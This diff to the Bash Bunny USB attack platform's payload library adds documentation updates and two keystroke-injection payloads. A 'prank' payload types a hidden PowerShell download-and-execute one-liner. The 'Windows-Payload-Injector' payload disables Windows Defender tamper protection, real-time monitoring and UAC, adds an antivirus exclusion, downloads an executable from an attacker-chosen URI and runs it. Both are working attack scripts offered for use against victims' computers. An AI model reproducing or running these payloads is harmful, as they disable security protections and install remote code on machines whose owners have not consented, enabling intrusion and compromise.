diff --git a/docs/readme.txt b/docs/readme.txt index ed0b9437..04f8598f 100644 --- a/docs/readme.txt +++ b/docs/readme.txt @@ -6,7 +6,7 @@ Bash Bunny by Hak5 USB Attack/Automation Platform - -+- QUICK REFERENCE GUIDE v1.4 -+- + -+- QUICK REFERENCE GUIDE v1.5 -+- +-----------------+ @@ -107,6 +107,8 @@ $HOST_IP IP Address of the Bash Bunny (Default: 172.16.64.1) $SWITCH_POSITION "switch1", "switch2" or "switch3" + $BB_LABEL Volume name of the BashBunny + when mounted. @@ -153,6 +155,8 @@ GET TARGET_HOSTNAME Returns $TARGET_HOSTNAME GET HOST_IP Returns $HOST_IP GET SWITCH_POSITION Returns $SWITCH_POSITION + GET TARGET_OS Returns $TARGET_OS + GET BB_LABEL Returns $BB_LABEL diff --git a/payloads/extensions/get.sh b/payloads/extensions/get.sh index 0ebd6e7d..791ad2c0 100755 --- a/payloads/extensions/get.sh +++ b/payloads/extensions/get.sh @@ -26,6 +26,10 @@ function GET() { [[ "${ScanForOS,,}" == *"linux"* ]] && export TARGET_OS='LINUX' && return export TARGET_OS='UNKNOWN' ;; + "BB_LABEL") + export BB_LABEL=$(ls -l /dev/disk/by-label/ | awk '/nandf$/ { print $9 }') + ;; + esac } diff --git a/payloads/library/prank/cApS-Troll/README.md b/payloads/library/prank/cApS-Troll/README.md new file mode 100644 index 00000000..d7011865 --- /dev/null +++ b/payloads/library/prank/cApS-Troll/README.md @@ -0,0 +1,105 @@ +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
    2. +
  2. Getting Started
    3. +
  3. Contributing
    4. +
  4. Version History
    5. +
  5. Contact
    6. +
  6. Acknowledgments
    7. +
+
+ +# cApS-Troll + +This payload is meant to prank your victim with TURNING on AND off CAPS LOCK + +## Description + +This payload is meant to prank your victim with TURNING on AND off CAPS LOCK + +## Getting Started + +### Dependencies + +* Dropbox or other file sharing service +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Device will download the file and place them in proper directories to then run the script +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here: + +[atomiczsec](https://github.com/atomiczsec) & +[I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + +
+ + C# + +
YouTube + 		+ + Python + +
Twitter + 		+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/payloads/library/prank/cApS-Troll/a.ps1 b/payloads/library/prank/cApS-Troll/a.ps1 new file mode 100644 index 00000000..fa7129c1 --- /dev/null +++ b/payloads/library/prank/cApS-Troll/a.ps1 @@ -0,0 +1,17 @@ +while (1){ +Start-Sleep -Second 45 +$wsh = New-Object -ComObject WScript.Shell +$wsh.SendKeys('{CAPSLOCK}') +Start-Sleep -Second 15 +$wsh = New-Object -ComObject WScript.Shell +$wsh.SendKeys('{CAPSLOCK}') +Start-Sleep -Second 15 +$wsh = New-Object -ComObject WScript.Shell +$wsh.SendKeys('{CAPSLOCK}') +Start-Sleep -Second 15 +$wsh = New-Object -ComObject WScript.Shell +$wsh.SendKeys('{CAPSLOCK}') +Start-Sleep -Second 15 +$wsh = New-Object -ComObject WScript.Shell +$wsh.SendKeys('{CAPSLOCK}') +} \ No newline at end of file diff --git a/payloads/library/prank/cApS-Troll/payload.txt b/payloads/library/prank/cApS-Troll/payload.txt new file mode 100644 index 00000000..9dc8ab8f --- /dev/null +++ b/payloads/library/prank/cApS-Troll/payload.txt @@ -0,0 +1,18 @@ +REM Title: cApS-Troll + +REM Author: atomiczsec + +REM Description: This payload is meant to prank your victim with TURNING on AND off CAPS LOCK + +REM Target: Windows 10 + +"URL='http://example.com/powershell.ps1?dl=1'" + +QUACK DELAY 2000 +QUACK GUI r +QUACK DELAY 500 +QUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL ; iex $pl +QUACK ENTER + +REM Remember to replace the link with your DropBox shared link for the intended file to download in the URL variable +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly diff --git a/payloads/library/remote_access/Windows-Payload-Injector/payload.txt b/payloads/library/remote_access/Windows-Payload-Injector/payload.txt new file mode 100644 index 00000000..eb7a55e5 --- /dev/null +++ b/payloads/library/remote_access/Windows-Payload-Injector/payload.txt @@ -0,0 +1,85 @@ +#!/bin/bash +# +# Title: Microsoft Windows Payload Injector +# +# Description: +# 1) Disables Tamper Protection in Windows Defender. +# 2) Disables UAC / Turns UAC off +# 3) Creates Payload Directory in C:/ Drive +# 4) Disables Real-Time Protection in Windows Defender. +# 5) Adds the Payload Directory as an exclusion in Windows Defender +# 6) Downloads Payload from Specified URI (Enter in Variable Below) +# 7) Runs Payload on System +# +# Author: KryptoKola +# Version: 1.0 +# Category: Remote Access +# Target: Microsoft Windows 10 & 11 + +LED SETUP +ATTACKMODE HID +#Variables +readonly PAYLOAD_DOWNLOAD_URI="ENTER PAYLOAD URI HERE" + +#Disables Tamper Protection in Windows 10 & 11 +LED STAGE1 +Q GUI s +Q STRING "Virus & threat protection" +Q ENTER +Q DELAY 10000 +Q TAB +Q TAB +Q TAB +Q TAB +Q ENTER +Q DELAY 1000 +Q TAB +Q TAB +Q TAB +Q TAB +Q SPACE +Q DELAY 1000 +Q ALT y +Q DELAY 1000 +Q ALT F4 +Q FN ALT F4 + +#Starts Powershell in Admin mode +LED STAGE2 +Q GUI r +Q DELAY 250 +Q STRING powershell Start-Process powershell -Verb runAs +Q ENTER +Q DELAY 3000 +Q ALT y +Q DELAY 5000 + +#Disables UAC, Creates Payload Directory, and moves to C:/ directory in powershell +LED STAGE3 +Q STRING "cd C:/;mkdir Payloads;Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;" +Q ENTER +Q DELAY 1500 +Q ALT y +Q DELAY 250 + +#Disables Real Time Protection, Makes an exclusion to the Payloads folder in Windows Defender, Navigates to the Payloads folder, then Downloads specified payload from URI. +LED STAGE4 +Q STRING "Set-MpPreference -DisableRealtimeMonitoring 1;Set-MpPreference -ExclusionPath "C:/Payloads";cd C:/Payloads;Start-BitsTransfer -Source ${PAYLOAD_DOWNLOAD_URI} -Destination ./payload.exe;" +Q ENTER +Q DELAY 2000 + +#Launches the Payload on the machine +LED STAGE5 +Q STRING ./payload.exe +Q ENTER +Q DELAY 250 + +#Clears the shell and exits out. +LED CLEANUP +Q STRING clear +Q ENTER +Q DELAY 250 +Q STRING exit +Q ENTER + +LED FINISH